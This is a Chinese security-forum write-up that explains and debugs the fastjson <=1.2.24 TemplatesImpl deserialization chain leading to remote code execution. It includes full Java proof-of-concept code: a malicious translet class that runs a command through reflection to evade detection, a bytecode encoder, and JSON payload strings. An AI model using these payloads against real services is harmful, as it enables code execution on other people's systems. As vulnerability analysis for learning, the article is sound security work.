问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
白话分析 fastjson<=1.2.24 TemplatesImpl调用链 rce
漏洞分析
详细的介绍了fastjson<1.2.24版本中反序列化漏洞TemplatesImpl调用链,并对其展开分析调试,适合java安全初学者阅读
前言: === 最近在学习java反序列化相关漏洞,那fastjson肯定是经典,fastjson可以说是养活了一代“安全人”; 分析下fastjson一个比较久远的反序列化漏洞: fastjson<=1.2.24 TemplatesImpl调用链原理以及调试过程。 漏洞触发总结 ====== **com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl**类中存在java 动态编程思想的实现,这里利用的是java动态编程里面的**Javassit**动态编程方式,简单说就是: `传统的java代码编译是编译生成class字节码文件,JVM会将这些字节码转换成机器码并执行,这个过程是在程序运行的时候进行的;但在该Javassit模式下提供了一些方法可以使我们手工编写的字节码传入JVM中执行;` TemplatesImpl中`_bytecodes`属性中存放着手工编写的字节码,并在其调用`getTransletInstance()`方法时会加载该字节码到JVM中获取到字节码中的类并调用newInstance()创建该类的实例,如果`_bytecodes`为可控的并且能找到一条触发getTransletInstance()方法的调用链,那么rce不就有了嘛。 该巧不巧,fastjson正好能提供上面两个条件(`_bytecodes`为可控的并且能找到一条触发getTransletInstance()方法的调用链)。 1、首先fastjson在反序列化将json还原成对象的时候,可以使用**\\@type**来指定类的,这里指定为`com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl`类,并可以构造相关属性的内容,所以在这里就可以将恶意类字节码对象提前准备好传入`_bytecodes`属性中 2、在fastjson反序列化过程中会调用JavaBeanDeserialze类的deserialze方法并在其中通过反射方式调用传入属性的get、set方法(这里是有条件的下文中会提到),并且在其调用属性`_outputProperties`的get方法:`getOutputProPerties()`方法中调用了`newTransformer()`方法从而触发`getTransletInstance()`方法也就导致了上述的rce。 接下来从两个方面开展分析调试工作: 1、静态分析 2、动态调试 调用链分析 ===== 静态分析 ---- 该漏洞利用这个类为:com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl 反过来分析这条调用链,思路比较明确: 1、首先我们找到触发执行恶意代码的地方,为:TemplatesImpl对象的`getTransletInstance()`方法中通过调用其属性`_class` 的newInstance()方法创建了一个实例化类,而该类为恶意类,从而执行了其静态方法和构造方法中的恶意代码: data:image/s3,"s3://crabby-images/861ec/861ec4192a8f6a6ffb07ffa5e88365d7f4fa45f3" alt="" 这里有2个小细节: (1)、通过newInstance()方法创建实例化的时候进行了强制类型转换`AbstractTranslet`,所以我们构造的恶意类要继承`AbstractTranslet`类。 (2)、TemplatesImpl对象的`_name`属性不能为空,不然直接return null了,所以构造的payload中要设置`_name`变量。 2、那么TemplaresImpl对象的`_class`属性是哪来的,又如何构造将其设置为想要的恶意类Class呢? 属性:`_bytecodes` data:image/s3,"s3://crabby-images/290c8/290c82b9ec29a5467f8585fd1e7b00ce2070c66a" alt="" 在TemplatesImpl类的`defineTransletClasses()`方法中:调用了ClassLoad的defineClass方法将`_bytecodes`字节码转换成java.lang.class对象并赋值到其`_class`属性中。 data:image/s3,"s3://crabby-images/feb7b/feb7b2d02364fd86cc721deb6742e8b0779496a6" alt="" 3、那么`_bytecodes`的值又是从哪来的呢?什么地方会吊用TemplatesImpl类的`defineTransletClasses()`方法呢? 1)、正好该类的getTransletInstance()方法中就调用了`defineTransletClasses()`方法,然后才去执行newInstance实例化操作的。 data:image/s3,"s3://crabby-images/dff6a/dff6a23e27c86ffe42ce4442b2a30b038f24e237" alt="" defineTransletClasses() 2)、当解决了上面第一个问题的时候,1、>什么时候会调用TemplatesImpl的getTransletInstance()方法?2、>关注点聚焦于`_bytecodes`属性如何设置为我们恶意对象class的字节码? 1、>在TemplatesImpl类中的newTransformer()方法中调用了`getTransletInstance()`方法: data:image/s3,"s3://crabby-images/0408a/0408ac03e5d31833c56ab0db938167a01951af0a" alt="" 而newTransformer()方法又被TemplatesImpl类里面的` getOutputProperties()`方法调用: data:image/s3,"s3://crabby-images/60658/60658ae7887bb4125a356802b0a17177ea8f7426" alt="" 那什么时候会调用getOutputProperties()方法呢? **此时回想以下我们fastjson在反序列化的时候的特殊性:** fastjson反序列化将json还原成对象的时候,会触发其对象的成员属性的set方法,以及部分成员属性的get方法,get方法的触发条件是: ```php 只存在getter方法,无settet方法。 方法名称长度大于4。 非静态方法。 方法名以get开头,且第四个字符为大写字母。 方法不用传入参数。 方法的返回值继承自 Collection、Map、AtomicBoolean、AtomicInteger 和AtomicLong的其中一个。 ``` 而上文提到的`getOutputProperties()`方法返回对象为Properties对象,该对象继承HashTable,而HashTable实现了Map接口。符合条件。所以payload中要设置`_outputProperites`就会触发调用链。 2、>在payload中设置`_bytecodes`为恶意类class文件的字节码base64编码文件。 ### 静态分析最后一个大问题 TemplateImapl中的只有属性变量`_outputProperties`没有属性`outputProperties`,所以调用的方法应该是`get_outputProperties`,那怎么办呢? fastjson中反序列化的时候,会调用javabeanDeserialze类里面的deserialze()方法,其中会调用`parseField()` data:image/s3,"s3://crabby-images/970be/970be44da09984c163588a4048bedd02c27bb862" alt="" 在parseField()方法里面调用了自身类里面的`SmartMatch()`方法 data:image/s3,"s3://crabby-images/b5f36/b5f36e5bfb26d59941141faff14c3d213d0c2b96" alt="" 该方法里面会对payload传入的属性进行一些操作,其中包括:发现以`_`开头的Filed(属性方法),会将`_`干掉。 data:image/s3,"s3://crabby-images/e5bea/e5bea41e20e7d3b530e1709f609776db61bb6f08" alt="" data:image/s3,"s3://crabby-images/97dd2/97dd2f03e9310a7de5bc4eb5e1d84ba2e165ec86" alt="" 所以这个问题就解决了!!! 动态调试: ----- ### 代码: #### 漏洞触发测试类: ```java import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.parser.Feature; public class fastjson124 { public static void main(String[] args) { EvalClastoBytes evalClastoBytes = new EvalClastoBytes(); String NASTY_CLASS="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"; String evilCode = evalClastoBytes.Starts(EvalClassforfastjsonTemplateImpl.class); String payload2 = "{\"@type\":\"" + NASTY_CLASS + "\",\"_bytecodes\":[\""+evilCode+"\"],'_name':'a.b',\"_outputProperties\":{ }}"; /* TemplatesImpl调用链 是否支持此调用链的关键就是在调用fastjson还原json为对象的时候带上Feature.SupportNonPublicField这个属性,因爲payload中的_bytecodes、_name屬性為私有屬性。 Feature.SupportNonPublicField这个属性在1.2.22版本才引入的,在1.2.25版本就被修复 */ JSON.parseObject(payload2,Object.class, Feature.SupportNonPublicField); } } ``` #### 恶意类: ```java import com.sun.org.apache.xalan.internal.xsltc.DOM; import com.sun.org.apache.xalan.internal.xsltc.TransletException; import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; import com.sun.org.apache.xml.internal.serializer.SerializationHandler; import java.lang.reflect.Method; public class EvalClassforfastjsonTemplateImpl extends AbstractTranslet { @Override public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { } @Override public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { } public EvalClassforfastjsonTemplateImpl() throws Exception{ // // Runtime.getRuntime().exec("calc"); //反射调用Runtime.getRuntime().exec("calc")执行命令,初级免杀 Class cls = Class.forName("java.lang.Runtime"); Method method = cls.getMethod("getRuntime",null); Object obs = method.invoke(null,null); Method method1 = obs.getClass().getMethod("exec",String.class); method1.invoke(obs,"calc"); } public static void main(String[] args) throws Exception{ EvalClassforfastjsonTemplateImpl evalClassforfastjsonTemplate = new EvalClassforfastjsonTemplateImpl(); } } ``` #### “提取恶意类字节码”类 ```java import com.sun.org.apache.bcel.internal.Repository; import java.util.Base64; public class EvalClastoBytes { /* 根据恶意类获取恶意类字节码的base64编码 */ public String Starts(Class<EvalClassforfastjsonTemplateImpl> Evalclass){ return Base64.getEncoder().encodeToString(Repository.lookupClass(Evalclass).getBytes()); } public static void main(String[] args) throws Exception{ // 测试代码 EvalClastoBytes evalClastoBytes = new EvalClastoBytes(); String xx = evalClastoBytes.Starts(EvalClassforfastjsonTemplateImpl.class); System.out.println(xx); } } ``` ### 结合上面代码和相关源码在几个关键点打上断点: jdk:1.8.031 1、fastjson调用`parseObject()`方法处: data:image/s3,"s3://crabby-images/253bd/253bdf166d910aeb753917ca83dae2ee57be1749" alt="" 2、反序列化时触发JavaBeanDeserialze类的`deserialze()`方法处 data:image/s3,"s3://crabby-images/3c3fe/3c3fe36839d0bb900c4210c2832e7584876f54c5" alt="" 3、JavaBeanDeserialze类的`deserialze()`方法里面调用`parseFiled()`方法处 data:image/s3,"s3://crabby-images/ba393/ba39359948bac0c4a1ae37fb6905587e02438407" alt="" 4、parceFiled()方法中调用`smartMatch()`方法处 data:image/s3,"s3://crabby-images/ebc2e/ebc2ef7e62d0423c5cd8af3e734f1479cd836e06" alt="" 5、TemplatesImpl类中调用getOutputProperties()方法并在其中调用newTransformer()方法处: data:image/s3,"s3://crabby-images/93646/93646a4f9fec4a5f55e3a5a17be0fe6b85a89b10" alt="" 6、newTransformer()方法中调用getTransletInstance()方法处 data:image/s3,"s3://crabby-images/c0274/c02745c21ed5b97150aa648082d25a196edfeb92" alt="" 7、getTransletInstace()方法中触发defineTransletClasses()方法和使用newInstance()获取恶意类实例对象的地方 data:image/s3,"s3://crabby-images/f6c62/f6c6284062ca19ebb4922e85d8d83ee41054b6ff" alt="" 8、defineTransletClasses()方法中使用defineClass将payload里面`_bytecodes`属性(恶意字节码)加载到内存中,并将获得的恶意类对象的赋值给`_class`属性。 data:image/s3,"s3://crabby-images/dee77/dee77c1959c342a52c28ad6e0ee34530af258396" alt="" data:image/s3,"s3://crabby-images/a0083/a0083c2a43956afa2bd246053b39053a5f18c493" alt="" ### 调试过程 1、fastjson反序列化触发JavaBeanDeserialze类的deserialze()方法: data:image/s3,"s3://crabby-images/2a4d6/2a4d6bc921abe9dd661ed7266f314bc6d65c24f5" alt="" 2、在其deserialze()方法中会循环调用parseField()对每个属性进行格式转换,但其处理的key为`_outputProperties`时 data:image/s3,"s3://crabby-images/54268/5426856d7c539c9635b7a3f368d8e67060537275" alt="" 3、其parseField()中会调用smartMatch()方法,并将`_outputProperties`作为key传入: data:image/s3,"s3://crabby-images/dc2cc/dc2cc8c9342cf7b443f592e4d413efd391a4cf33" alt="" 4、和在静态中分析的一样,在其smartMatch()方法中在对其格式进行处理的时候会调用替换函数将`key`中的下划线干掉了,变成`outputProperties`赋值给key2: data:image/s3,"s3://crabby-images/f52f8/f52f8dd0695abf99e50d6238999de01023fbbca5" alt="" 5、并在后续调用getFiledDeserialzer()方法时传入的参数为key2 data:image/s3,"s3://crabby-images/f485d/f485d3d5c654fef974dba6c54e84d5dc1dbc50ae" alt="" 6、跟进到其在反序列化过程中利用反射调用属性的set、get方法(这里并不是都调用,具体在上面原理剖析的时候提到了)从而还原其对象的时候:这里接着上面对`outputProperties`属性的处理进行跟进发现调用其getOutputProperties()方法,并在该方法从调用了newTransformer()方法: data:image/s3,"s3://crabby-images/86afc/86afc4168b568807ec55b1ec85807e017979dac9" alt="" 此时的调用链是: data:image/s3,"s3://crabby-images/5361f/5361f6415b052fb336c9bd011917c8a822553d92" alt="" 7、跟进newTransformer()方法,在其中调用了getTransletInstance()方法: data:image/s3,"s3://crabby-images/8fd20/8fd20015bff8d577383f27443bdf0598861db234" alt="" 8、跟进getTransletInstance()方法:里面简单的对`_class`和`_name`做了一个判断: data:image/s3,"s3://crabby-images/7dd60/7dd60fd6ade1b91dd2267674b07b585fee4337b7" alt="" (1、`_name`属性要不为空,不然直接return null了,所以在payload中对其`_name`属性进行了定义,并传入值。 (2、`_class`属性要为空,才能使其执行`defineTransletClasses()`方法,不妨跟进下该方法:在该方法中,当`_bytecodes`不为空的时候,会调用TransletClassLoad的defineClass()方法加载位于`_bytecodes`中的恶意类字节码到内存,并将返回的恶意类赋值`_class`属性 data:image/s3,"s3://crabby-images/3a780/3a780f54c4b5dfb1c6acb6375e44a44f5ceb44c8" alt="" 9、回到getTransletInstance()方法中,再执行了`defineTransletClasses()`方法方法之后,紧接着就是调用newInstance()方法实例化了刚刚写入的恶意类对象,从而触发了恶意类对象里面静态模块或者构造函数里面的恶意代码的执行! data:image/s3,"s3://crabby-images/b5a61/b5a61373aee217966ea23aa7412034a1a1692090" alt="" 重复下上面有提到的一个细节问题:恶意类要继承AbstractTranslet类,原因就是这里在实例化的时候源码中对其进行了强制类型转换, 动态调试工作就到此结束了!最后的调用链如下: data:image/s3,"s3://crabby-images/64d62/64d6204beb4d064d00f641e9bbaa0dc2c85b52f3" alt="" payload的问题: ----------- 问:细心的师傅最开始复现的时候发现了一个问题,网上有很多TemplatesImpl调用链的poc,为什么poc中有些属性”可有可无“,并不会影响触发的调用链条以及造成任意代码执行,那poc中为啥要把这些”可有可无“的属性加上去呢? 如下是jdk8.0\_31中测试可用的poc: ```php String payload2 = "{\"@type\":\"" + NASTY_CLASS + "\",\"_bytecodes\":[\""+evilCode+"\"],'_name':'a.b',\"_outputProperties\":{ }}"; ``` 会发现只要有触发调用链必备的三个属性(上文分析中提到过`_bytecodes`和`_name`和`_outputProperties`)就能造成rce; 那网上常见poc中的`_tfactory`、`_transletIndex`、`_auxClasses`属性的作用是什么呢,真的是可有可无吗? ```java String payload2 = "{\"@type\":\"" + NASTY_CLASS + "\",\"_bytecodes\":[\""+evilCode+"\"],'_name':'a.b','_tfactory':{ },\"_transletIndex\":0,\"_auxClasses\":{ },\"_outputProperties\":{ }}"; ``` 答:那必然不会是可有可无,在参考了xxlegend师傅的一篇[文章](http://xxlegend.com/2018/01/25/2017%E5%B9%B4%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%B9%B4%E5%BA%A6%E6%8A%A5%E5%91%8A/) 找到原因:设置这些属性简单总结就是说,增加了poc的兼容性,拿`_tfactory`举例,其在TemplatesImpl类里面既没有set也没有get方法,如果payload中没有设置`_tfactory`属性,在某些jdk版本中在defineTransletClasses()用到会引用\_tfactory属性但是找不到从而导致异常退出,调用链就断了,而如果在poc中写入该属性,fastjson会调用其无参构造函数生成一个`_tfactory`对象;至于具体哪些jdk版本存在差异化,有兴趣的师傅们可以研究研究。 总结 == 常见初代fastjson反序列化漏洞的利用方式有三种,TemplatesImpl是其中一种,也是条件要求最苛刻的一种(需要在反序列化的时候传入SupportNonPublicFiled支持对私有变量的处理),其实战价值不大,但是学习该链的原理是十分有意义的,不仅使我对fastjson反序列化的运作机制更加深刻了,其次是这条调用链和cc4是有紧密关联的(原理一样大同小异),还有就是对代码漏洞挖掘的思维有了更多理解。好家伙一举三得呀! 最后想简单聊聊fastjson,从JdbcRowSetImpl到TemplatesImpl,fastjson这两条利用链的核心是:fastjson反序列化当使用**\\@type**指定类的时候,在反序列化还原json为对象的过程中会调用反射调用其属性的set、get方法\*(不是全调用,分析情况,上文有提及),从而导致rce!后续的话会继续写些fastjson>1.2.24版本的补丁情况以及绕过方式的相关文章 常见初代fastjson反序列化漏洞的利用方式有三种,最后一种是针对不能出网使用的,记得没错的话应该是bcel方式,也是非常值得去学习的,bcel这个编码技术是常见的jsp免杀手段之一。 参考文章: ===== <http://www.52bug.cn/hkjs/4686.html> <http://xxlegend.com/> <https://samny.blog.csdn.net/article/details/106160182>
发表于 2022-01-17 09:42:31
阅读 ( 8166 )
分类:
漏洞分析
9 推荐
收藏
0 条评论
请先
登录
后评论
gaowei
奇安信搬砖人
2 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!